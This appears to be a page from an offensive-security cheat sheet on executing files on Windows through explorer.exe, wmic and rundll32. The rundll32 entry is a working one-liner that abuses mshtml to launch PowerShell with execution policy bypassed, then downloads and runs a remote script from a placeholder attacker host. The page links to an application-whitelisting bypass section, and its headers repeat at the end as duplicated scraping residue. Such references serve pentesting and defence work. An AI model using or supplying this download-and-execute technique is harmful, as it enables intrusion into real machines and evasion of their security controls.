File Execution

Tools: File explorer, wmic, rundll32

FILE EXPLORER

1)

explorer.exe /root,"C:\windows\system32\calc.exe

WMIC

1)

wmic.exe process call create calc

RUNDLL32

1)

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();new%20ActiveXobject("WScript.Shell").Run("Powershell -nop -exec bypass -c IEX(New-ObjectNet.WebClient).DownloadString('http://ATTACK_IP/script.ps1');");

PreviousApplication Whitelisting Bypass NextFile Operations

Last updated 8 months ago

hashtagTools: File explorer, wmic, rundll32

hashtagFILE EXPLORER

hashtag1)

hashtagWMIC

hashtag1)

hashtagRUNDLL32

hashtag1)

Tools: File explorer, wmic, rundll32

FILE EXPLORER

1)

WMIC

1)

RUNDLL32

1)